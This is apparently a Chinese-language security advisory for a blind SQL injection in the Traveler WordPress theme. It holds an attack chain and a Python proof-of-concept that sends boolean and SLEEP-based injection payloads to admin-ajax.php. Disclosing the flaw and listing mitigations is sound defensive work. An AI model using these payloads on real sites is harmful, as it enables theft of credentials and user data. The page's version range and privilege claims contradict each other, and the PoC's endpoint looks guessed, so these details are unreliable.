CVE-2025-64371 WordPress Traveler主题Blind SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-64371

漏洞类型

SQL注入

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

shinetheme Traveler (WordPress主题)

漏洞概述

CVE-2025-64371是WordPress Traveler主题中的一个高危SQL注入漏洞，CVSS评分8.5。该漏洞由于对特殊元素的不当中和处理，导致存在Blind SQL注入风险。Traveler是一款由shinetheme开发的热门WordPress旅游主题，被广泛用于旅游网站、酒店预订、景点介绍等场景。攻击者可以利用该漏洞通过低权限账户或无需认证的方式，在受影响系统中执行恶意SQL查询，窃取数据库中的敏感信息，包括用户数据、密码哈希、管理员凭证等。该漏洞影响Traveler主题从任意版本到3.2.6的所有版本，鉴于该主题的广泛使用，建议用户立即采取修复措施。

技术细节

该漏洞属于Blind SQL注入（布尔型SQL注入）类型。漏洞源于Traveler主题在处理用户输入时，未对特殊字符进行充分的过滤和转义处理。攻击者可以通过构造特定的SQL payloads，利用页面响应内容的差异（如HTTP状态码、响应时间、页面内容长度等）来判断SQL查询的真假，从而逐步提取数据库中的敏感信息。由于是Blind SQL注入，攻击者无法直接看到数据库查询结果，需要通过大量请求和逻辑推理来逐步获取数据。攻击者通常会利用UNION SELECT、布尔条件判断、时间延迟等技术来构建攻击向量。该漏洞的CVSS向量为AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L，表明攻击者可通过网络远程利用，无需特殊权限，且对机密性影响较高。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用WordPress及Traveler主题，可通过检查页面特征、HTML源码中的theme路径、wp-content/themes/traveler等标识

STEP 2

步骤2: 漏洞探测

攻击者针对Traveler主题的搜索功能或相关API端点（如admin-ajax.php）发送包含SQL注入payload的请求，观察响应差异以确认漏洞存在

STEP 3

步骤3: 构造恶意请求

利用Blind SQL注入技术，构造基于布尔条件或时间延迟的payload，通过UNION SELECT或子查询逐步提取数据库信息

STEP 4

步骤4: 数据提取

通过大量自动化请求，遍历数据库表名、字段名，提取敏感数据如用户表(wp_users)中的用户名、密码哈希、邮箱等

STEP 5

步骤5: 权限提升

如果获取到管理员凭证，可登录后台通过插件上传或主题编辑功能实现远程代码执行，获得服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64371 Blind SQL Injection PoC
# Target: WordPress site with Traveler theme < 3.2.6

def check_vulnerability(url):
    """Check if target is vulnerable to CVE-2025-64371"""
    # Common Traveler endpoints that may be vulnerable
    test_endpoints = [
        '/wp-admin/admin-ajax.php',
        '/?ajaxify=1'
    ]
    
    # Blind SQL injection payload for boolean-based detection
    true_payload = "1' AND 1=1 -- -"
    false_payload = "1' AND 1=2 -- -"
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    for endpoint in test_endpoints:
        target_url = url.rstrip('/') + endpoint
        try:
            # Test with true condition
            resp_true = requests.get(target_url, params={'action': 'st_search', 'search': true_payload}, headers=headers, timeout=10)
            # Test with false condition
            resp_false = requests.get(target_url, params={'action': 'st_search', 'search': false_payload}, headers=headers, timeout=10)
            
            # If responses differ, vulnerability may exist
            if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text):
                return True, endpoint
        except Exception as e:
            continue
    return False, None

def extract_data(url, endpoint):
    """Extract database information using blind SQL injection"""
    # Example: Extract database version
    db_version_payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(3) ELSE 1 END) -- -"
    
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}
    target_url = url.rstrip('/') + endpoint
    
    try:
        response = requests.get(target_url, params={'action': 'st_search', 'search': db_version_payload}, headers=headers, timeout=15)
        # If response takes > 3 seconds, MySQL 5.x is confirmed
        return response.elapsed.total_seconds() > 3
    except:
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-64371.py <target_url>')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Checking target: {target}')
    
    is_vuln, endpoint = check_vulnerability(target)
    if is_vuln:
        print(f'[+] Target appears vulnerable! Endpoint: {endpoint}')
        print('[*] Manual verification recommended')
    else:
        print('[-] Target does not appear vulnerable or is not using Traveler theme')

影响范围

shinetheme Traveler < 3.2.6

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 使用WAF规则阻止包含SQL注入特征的请求；2) 临时禁用Traveler主题的搜索和相关功能；3) 对WordPress管理员账户启用双因素认证；4) 限制对admin-ajax.php等敏感接口的访问；5) 监控日志中的异常SQL查询行为；6) 考虑使用网站应用防火墙服务如Cloudflare、Sucuri等。